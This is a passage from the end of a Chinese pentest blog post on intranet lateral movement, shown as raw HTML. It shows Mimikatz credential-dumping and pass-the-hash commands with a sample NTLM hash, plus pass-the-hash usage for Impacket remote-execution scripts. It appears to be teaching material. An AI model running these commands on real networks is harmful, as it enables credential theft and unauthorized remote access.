2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<h3><span id="evil-winrm">Evil-Winrm</span></h3><p><a target="_blank" rel="noopener" href="https://github.com/Hackplayers/evil-winrm">https://github.com/Hackplayers/evil-winrm</a></p>
<h2><span id="pth哈希传递">PTH哈希传递</span></h2><p>利用Mimikatz进行PTH<br>Mimikatz内置了哈希传递的功能，需要本地管理员权限。<br>① 抓取用户的哈希</p>
<div class="code-container" code-lang="Awk"><div class="codebox"><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe <span class="string">&quot;privilege::debug&quot;</span> <span class="string">&quot;sekurlsa::logonpasswords full&quot;</span> <span class="keyword">exit</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>② 利用抓取的域管理员的NTLM hash进行哈希传递</p>
<div class="code-container" code-lang="Awk"><div class="codebox"><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe <span class="string">&quot;privilege::debug&quot;</span> <span class="string">&quot;sekurlsa::pth /user:Administrator /domain:hackme.com /ntlm:93b95aef15f4d50fab96ffc44a2f326a&quot;</span> <span class="keyword">exit</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><strong>利用impacket进行PTH</strong><br>Impacket项目中具有远程执行功能的几个脚本几乎都可以进行哈希传递攻击，常见的有：</p>
<div class="code-container" code-lang="Vim"><div class="codebox"><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">psexec.<span class="keyword">py</span>      # 类似PSEXEC的功能示例，使用remcomsvc（https://github.<span class="keyword">com</span>/kavika13/remcom）</span><br><span class="line">smbexec.<span class="keyword">py</span>     # 与使用remcomsvc的psexec <span class="keyword">w</span>/<span class="keyword">o</span>类似的方法。这里描述了该技术。我们的实现更进一步，实例化本地smbserver以接收命令的输出。这在目标计算机没有可写共享可用的情况下很有用。</span><br><span class="line">atexec.<span class="keyword">py</span>      # 此示例通过Task Scheduler服务在目标计算机上执行命令，并返回已执行命令的输出。</span><br><span class="line">wmiexec.<span class="keyword">py</span>     # 通过Windows Management Instrumentation使用的半交互式<span class="keyword">shell</span>，它不需要在目标服务器上安装任何服务/代理，以管理员身份运行，非常隐蔽。</span><br><span class="line">dcomexec.<span class="keyword">py</span>    # 类似于wmiexec.<span class="keyword">py</span>的半交互式<span class="keyword">shell</span>，但使用不同的DCOM端点。目前支持MMC20.Application，ShellWindows和ShellBrowserWindow对象。</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>用法：</p>
<div class="code-container" code-lang="Nginx"><div class="codebox"><figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 普通用法</span></span><br><span class="line"><span class="attribute">python3</span> xxx.py domain/user:password<span class="variable">@ip</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 哈希传递</span></span><br><span class="line">python3 xxx.py domain/user<span class="variable">@ip</span> -hashes :93b95aef15f4d50fab96ffc44a2f326a</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

</div><div class="post-reward"><div class="post-reward-btn" title="赞赏作者"><img src="/assets/images/svg/uc/uc-gift.svg" class="icon noview" alt="Icon"><span></span></div><div class="post-reward-content"><div class="post-reward-text"></div><div class="post-reward-list"><a href="/null" target="_blank">致谢名单</a></div></div></div><div class="post-copyright"><div class="post-copyright-info">本作品由 jjjing 于 2023-12-27 15:11:33 发布</div><div class="post-copyright-link"><span>作品地址：<a href="https://jinggg1123.github.io/archives/2023/12/27/%E5%86%85%E7%BD%91%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/">内网横向移动</a></span><button class="copy-text" type="button" data-text="https://jinggg1123.github.io/archives/2023/12/27/%E5%86%85%E7%BD%91%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/">复制</button></div><div class="post-copyright-detail">除特别声明外，本站作品均采用 <a href='https://creativecommons.org/licenses/by-nc-sa/4.0/' title='Attribution-NonCommercial-ShareAlike' target='_blank'>CC BY-NC-SA 4.0</a> 许可协议，转载请注明来自 <a href='/'>jjjing</a></div><img class="post-copyright-icon noview" src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></div><div class="post-tail-tags"></div><div class="post-nav"><a class="post-nav-prev" nopost=""></a><a class="post-nav-next" href="/2023/12/23/Windows%E6%8F%90%E6%9D%83%EF%BC%88%E4%B8%8A%EF%BC%89/" title="Windows提权(上)">下一篇<span>Windows提权(上)</span></a></div></div><aside id="post-sidebar" status="show" active=""><div id="toc-container"><div class="toc-title"><img src="/assets/images/svg/ta/ta-toc.svg" class="icon noview" alt="Icon"><span>目录</span></div><div class="toc-content" id="toc-div"><ol class="toc-list"><li class="toc-list-item toc-list-level-2"><a class="toc-list-link"><span class="toc-list-text">网络共享</span></a></li><li class="toc-list-item toc-list-level-2"><a class="toc-list-link"><span class="toc-list-text">文件传输</span></a></li><li class="toc-list-item toc-list-level-2"><a class="toc-list-link"><span class="toc-list-text">执行程序或命令</span></a><ol class="toc-list-child"><li class="toc-list-item toc-list-level-3"><a class="toc-list-link"><span class="toc-list-text">计划任务</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link"><span class="toc-list-text">系统服务</span></a></li></ol></li><li class="toc-list-item toc-list-level-2"><a class="toc-list-link"><span class="toc-list-text">RDP远程桌面协议</span></a></li><li class="toc-list-item toc-list-level-2"><a class="toc-list-link"><span class="toc-list-text">PsExec远程管理工具</span></a></li><li class="toc-list-item toc-list-level-2"><a class="toc-list-link"><span class="toc-list-text">WMI</span></a></li><li class="toc-list-item toc-list-level-2"><a class="toc-list-link"><span class="toc-list-text">DCOM</span></a><ol class="toc-list-child"><li class="toc-list-item toc-list-level-3"><a class="toc-list-link"><span class="toc-list-text">MMC20.Application</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link"><span class="toc-list-text">ShellWindows</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link"><span class="toc-list-text">Excel.Application</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link"><span class="toc-list-text">ShellBrowserWindow</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link"><span class="toc-list-text">Impacket里的dcomexec.py脚本</span></a></li></ol></li><li class="toc-list-item toc-list-level-2"><a class="toc-list-link"><span class="toc-list-text">WinRM</span></a><ol class="toc-list-child"><li class="toc-list-item toc-list-level-3"><a class="toc-list-link"><span class="toc-list-text">通过WinRM执行远程命令</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link"><span class="toc-list-text">Evil-Winrm</span></a></li></ol></li><li class="toc-list-item toc-list-level-2"><a class="toc-list-link"><span class="toc-list-text">PTH哈希传递</span></a></li></ol></div></div><script>document.addEventListener('DOMContentLoaded', function () {
  var headings = Array.from(document.querySelectorAll('.post h1, .post h2, .post h3, .post h4, .post h5, .post h6'));
  var usedHeadings = [];

  document.querySelectorAll('#toc-container .toc-list-link').forEach(function (link) {
    var title = link.querySelector('.toc-list-text').textContent.trim();
    var item = link.closest('.toc-list-item');
    var level = (item.className.match(/toc-list-level-(\d)/) || [])[1];
    var heading = headings.find(function (node) {
      return usedHeadings.indexOf(node) === -1 &&
        (!level || node.tagName === 'H' + level) &&
        node.textContent.trim() === title;
    });
    if (!heading) return;

    var target = heading.id ? heading : heading.querySelector('[id]');
    if (!target) return;
    usedHeadings.push(heading);
    link.setAttribute('href', '#' + encodeURIComponent(target.id));
    link.setAttribute('data-toc-target', target.id);
  });

  document.addEventListener('click', function (event) {
    var link = event.target.closest('#toc-container .toc-list-link[data-toc-target]');
    if (!link) return;

    var heading = document.getElementById(link.getAttribute('data-toc-target'));
    if (!heading) return;

    event.preventDefault();
    event.stopPropagation();
    window.history.pushState(null, '', link.getAttribute('href'));
    heading.scrollIntoView({ behavior: 'smooth', block: 'start' });
  }, true);
});</script></aside></div></div><div id="toolbar" hide=""><div id="toolbar-setting-container" hide=""><div class="toolbar-item"><button id="tool-color-mode" title="深色模式" type="button"><img src="/assets/images/svg/ta/ta-moon.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button class="copy-text" id="tool-share" title="分享" type="button" data-text="https://jinggg1123.github.io/archives/2023/12/27/%E5%86%85%E7%BD%91%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/"><img src="/assets/images/svg/ta/ta-share.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-font-size-plus" title="放大字体" type="button"><img src="/assets/images/svg/ta/ta-text-plus.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-font-size-minus" title="缩小字体" type="button"><img src="/assets/images/svg/ta/ta-text-minus.svg" class="icon noview" alt="Icon"></button></div></div><div class="toolbar-container"><div class="toolbar-item"><button id="tool-setting" title="设置" type="button"><img src="/assets/images/svg/ta/ta-setting.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-toc" title="目录" type="button" aria-controls="post-sidebar" aria-expanded="true"><img src="/assets/images/svg/ta/ta-toc.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-gototop" title="返回顶部" type="button"><img src="/assets/images/svg/ta/ta-up.svg" class="icon noview" alt="Icon"></button></div></div></div><div id="music-player"></div></main><footer><div class="footer"><div id="footer-copyright">© 2021 - 2026 <span>💗</span> <a href="/null">jjjing</a></div><div id="footer-info"><div id="footer-framework">🚀本站由 <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/chanwj/hexo-theme-meow" title="3.3.2" target="_blank">Meow</a> 强力驱动</div><div id="footer-runtime"><span id="runtime" data-startdate="2021-11-23T22:16:20.000Z">🌻已稳定运行.年.月.天</span></div></div></div></footer><div class="scripts"><script>const GLOBALCONFIG = {
  root: '/',
  toolbar: true,
  lazyload_src: '/assets/images/Meow-Loading.webp',
  friends: false,
  album: '',
  codeblock: true,
  code_copy_text: true,
  share_text: '🐱Share From Meow',
  onblur_title: 'Please Come Back～✧(´▽`ʃ♡ƪ)',
  mouse_click: false,
  notify:{
    enable: false,
    info: '复制成功～转载请标注本文地址',
    f12_info: '开发者模式已打开，请遵循本站版权协议'
  },
  search: {
    enable: false,
    path: '',
    local: {
      top_n_per_article: 1,
      preload: false
    }
  },
  encrypt: false,
  category: false,
};
</script><script>if (!localStorage.getItem('color-mode')) {
  localStorage.setItem('color-mode', 'light' || 'light');
}
document.body.setAttribute('data-mode', localStorage.getItem('color-mode'));
</script>
<script src="/js/theme/tools/utils.js"></script>

<script src="/js/plugins/dist/lazyload.min.js"></script>

<script src="/js/plugins/view-image.min.js"></script>
<script>if (localStorage.getItem('font-size')) {
  document.querySelector('.post').style.fontSize = localStorage.getItem('font-size') + 'px';
}
</script>
<script src="/js/plugins/dist/APlayer.min.js"></script>
<script>const initAplayer = (data) => {
  if (!data.length) return;

  const ap = new APlayer({
    container: document.getElementById('music-player'),
    fixed: true,
    autoplay: false,
    theme: '#FFB347',
    loop: 'all',
    order: 'list',
    volume: 0.7,
    lrcType: 3,
    audio: data
  });

  ap.on('play', () => {
    document.getElementById('music-player').setAttribute("play", "");
  });
  ap.on('pause', () => {
    document.getElementById('music-player').removeAttribute("play");
  });
};

const fetchData = () => {
  fetch('')
    .then(res => res.json())
    .then(result => initAplayer(result));
};

if ('') {
  document.addEventListener("DOMContentLoaded", fetchData);
} else {
  document.addEventListener("DOMContentLoaded", initAplayer());;
}</script>
<script src="/js/main.js" type="module"></script>
</div></body></html>